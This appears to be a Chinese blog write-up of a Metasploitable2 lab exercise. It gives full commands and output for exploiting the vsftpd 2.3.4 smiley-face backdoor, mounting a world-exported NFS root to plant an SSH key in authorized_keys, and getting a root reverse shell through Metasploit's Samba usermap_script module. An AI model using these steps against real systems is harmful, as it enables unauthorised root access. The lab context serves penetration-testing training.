Metasploitable2系列练习-漏洞利用之vsftpd后门与linuxNFS共享目录配置漏洞

继续上一篇的内容,本次使用的是vsftpd后门与linuxNFS共享目录配置漏洞和Samba3.X漏洞利用。

vsftpd后门

nmap扫描

发现21端口运行着vsftpd服务,版本是2.3.4

这个特别的版本包含一个后门允许一个未知的入侵者进入核心代码。这个后门很快就被确认并且移除。但是移除之前已经被少数人下载下来。如果在发送的用户名后面加上”:)“(笑脸符号),这个版本的后门会在6200端口上打开一个监听的shell。

我们可以通过telnet确认或者通过metasploit上面的攻击模块自动攻击。

telnet手动利用

尝试连接:

1
2
3
4
5
6
7
8
telnet 192.168.52.144 21
Trying 192.168.52.144...
Connected to 192.168.52.144.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user attack:)
331 Please specify the password.

再开一个窗口,尝试使用telnet连接6200端口,并使用python -c ‘import pty;pty.spawn(“/bin/bash”)’获取伪终端:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
telnet 192.168.52.144 6200
Trying 192.168.52.144...
Connected to 192.168.52.144.
Escape character is '^]'.
id;
uid=0(root) gid=0(root)
: command not found
python -c 'import pty;pty.spawn("/bin/bash")';
root@metasploitable:/# ls
ls
bin    dev   initrd      lost+found  nohup.out  root  sys  var
boot   etc   initrd.img  media       opt        sbin  tmp  vmlinuz
cdrom  home  lib         mnt         proc       srv   usr

MSF自动利用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
msf5 > search vsftpd

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution


msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options 

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   21               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.52.144
rhost => 192.168.52.144

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit 

[*] 192.168.52.144:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.52.144:21 - USER: 331 Please specify the password.
[+] 192.168.52.144:21 - Backdoor service has been spawned, handling...
[+] 192.168.52.144:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.52.134:40789 -> 192.168.52.144:6200) at 2020-05-05 16:14:46 +0800

python -c 'import pty;pty.spawn("/bin/bash")'
root@metasploitable:/# id
id
uid=0(root) gid=0(root)
root@metasploitable:/#

linux NFS共享目录配置漏洞

查看nfs是否开放

rpcinfo -p [target ip]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
xin@kali:~$ rpcinfo -p 192.168.52.144
   program vers proto   port  service
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp  38822  status
    100024    1   tcp  50018  status
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100003    4   udp   2049  nfs
    100021    1   udp  47531  nlockmgr
    100021    3   udp  47531  nlockmgr
    100021    4   udp  47531  nlockmgr
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
    100021    1   tcp  52585  nlockmgr
    100021    3   tcp  52585  nlockmgr
    100021    4   tcp  52585  nlockmgr
    100005    1   udp  36165  mountd
    100005    1   tcp  39215  mountd
    100005    2   udp  36165  mountd
    100005    2   tcp  39215  mountd
    100005    3   udp  36165  mountd
    100005    3   tcp  39215  mountd

查看目标设置的共享目录列表

showmount -e [target ip]

1
2
3
xin@kali:~$ showmount -e 192.168.52.144
Export list for 192.168.52.144:
/ *

发现共享根目录下所有目录。

生成rsa 公钥

ssh-keygen

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
xin@kali:~$ ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/home/xin/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/xin/.ssh/id_rsa.
Your public key has been saved in /home/xin/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:1E7/aDLdsjBakGT1TaaGUsA1MEnTYZWqajDBoaPPjCs xin@kali
The key's randomart image is:
+---[RSA 3072]----+
|       o**Bo..o  |
|    .   oB.+.=   |
|   o .  = +.+ .  |
|  o o  + =.o     |
| . . .  S.. .    |
|.   o   .. . +   |
| =   o .  * = o  |
|E +   o  o * o   |
|o.   .  .   .    |
+----[SHA256]-----+

挂载

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
xin@kali:~$ mkdir /tmp/msftables
xin@kali:~$ mount -o nolock -t nfs 192.168.52.144:/ /tmp/msftables
mount: only root can use "--options" option
xin@kali:~$ sudo mount -o nolock -t nfs 192.168.52.144:/ /tmp/msftables
[sudo] xin 的密码:
xin@kali:~$ cat /home/xin/.ssh/id_rsa.pub >> /tmp/msftables/root/.ssh/authorized_keys 
bash: /tmp/msftables/root/.ssh/authorized_keys: 权限不够

xin@kali:~$ sudo cat /home/xin/.ssh/id_rsa.pub >> /tmp/msftables/home/msfadmin/.ssh/authorized_keys 
xin@kali:~$ ssh msfadmin@192.168.52.144
The authenticity of host '192.168.52.144 (192.168.52.144)' can't be established.
RSA key fingerprint is SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.52.144' (RSA) to the list of known hosts.
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
Last login: Tue May  5 04:14:33 2020
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

msfadmin@metasploitable:~$ whoami
msfadmin
msfadmin@metasploitable:~$

中间试着把认证公钥放到root目录下时显示权限不够,不得已只能放到用户目录下使用msfadmin权限,后面还可以使用之前的套路提权。

samba smbd 3.x

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
msf5 exploit(linux/samba/is_known_pipename) > search samba

Matching Modules
================

   #   Name                                                 Disclosure Date  Rank       Check  Description
   -   ----                                                 ---------------  ----       -----  -----------
   0   auxiliary/admin/smb/samba_symlink_traversal                           normal     No     Samba Symlink Directory Traversal
   1   auxiliary/dos/samba/lsa_addprivs_heap                                 normal     No     Samba lsa_io_privilege_set Heap Overflow
   2   auxiliary/dos/samba/lsa_transnames_heap                               normal     No     Samba lsa_io_trans_names Heap Overflow
   3   auxiliary/dos/samba/read_nttrans_ea_list                              normal     No     Samba read_nttrans_ea_list Integer Overflow
   4   auxiliary/scanner/rsync/modules_list                                  normal     No     List Rsync Modules
   5   auxiliary/scanner/smb/smb_uninit_cred                                 normal     Yes    Samba _netr_ServerPasswordSet Uninitialized Credential State
   6   exploit/freebsd/samba/trans2open                     2003-04-07       great      No     Samba trans2open Overflow (*BSD x86)
   7   exploit/linux/samba/chain_reply                      2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)
   8   exploit/linux/samba/is_known_pipename                2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load
   9   exploit/linux/samba/lsa_transnames_heap              2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow
   10  exploit/linux/samba/setinfopolicy_heap               2012-04-10       normal     Yes    Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   11  exploit/linux/samba/trans2open                       2003-04-07       great      No     Samba trans2open Overflow (Linux x86)
   12  exploit/multi/samba/nttrans                          2003-04-07       average    No     Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   13  exploit/multi/samba/usermap_script                   2007-05-14       excellent  No     Samba "username map script" Command Execution
   14  exploit/osx/samba/lsa_transnames_heap                2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   15  exploit/osx/samba/trans2open                         2003-04-07       great      No     Samba trans2open Overflow (Mac OS X PPC)
   16  exploit/solaris/samba/lsa_transnames_heap            2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   17  exploit/solaris/samba/trans2open                     2003-04-07       great      No     Samba trans2open Overflow (Solaris SPARC)
   18  exploit/unix/http/quest_kace_systems_management_rce  2018-05-31       excellent  Yes    Quest KACE Systems Management Command Injection
   19  exploit/unix/misc/distcc_exec                        2002-02-01       excellent  Yes    DistCC Daemon Command Execution
   20  exploit/unix/webapp/citrix_access_gateway_exec       2010-12-21       excellent  Yes    Citrix Access Gateway Command Execution
   21  exploit/windows/fileformat/ms14_060_sandworm         2014-10-14       excellent  No     MS14-060 Microsoft Windows OLE Package Manager Code Execution
   22  exploit/windows/http/sambar6_search_results          2003-06-21       normal     Yes    Sambar 6 Search Results Buffer Overflow
   23  exploit/windows/license/calicclnt_getconfig          2005-03-02       average    No     Computer Associates License Client GETCONFIG Overflow
   24  exploit/windows/smb/group_policy_startup             2015-01-26       manual     No     Group Policy Script Execution From Shared Resource
   25  post/linux/gather/enum_configs                                        normal     No     Linux Gather Configurations


msf5 exploit(linux/samba/is_known_pipename) > use exploit/multi/samba/usermap_script 
msf5 exploit(multi/samba/usermap_script) > set rhost 192.168.52.144
rhost => 192.168.52.144
msf5 exploit(multi/samba/usermap_script) > show options 

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.52.144   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(multi/samba/usermap_script) > exploit 

[*] Started reverse TCP double handler on 192.168.52.134:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 7VUWl3ceAVJuDGMo;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "7VUWl3ceAVJuDGMo\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (192.168.52.134:4444 -> 192.168.52.144:60318) at 2020-05-05 17:10:26 +0800

id
uid=0(root) gid=0(root)


#漏洞利用 #Metasploitable2
Metasploitable2系列练习-漏洞利用之vsftpd后门与linuxNFS共享目录配置漏洞
https://chujian521.github.io/blog/2020/05/05/Metasploitable2系列练习-漏洞利用之vsftpd后门与linuxNFS共享目录配置漏洞/
作者
Encounter
发布于
2020年5月5日
许可协议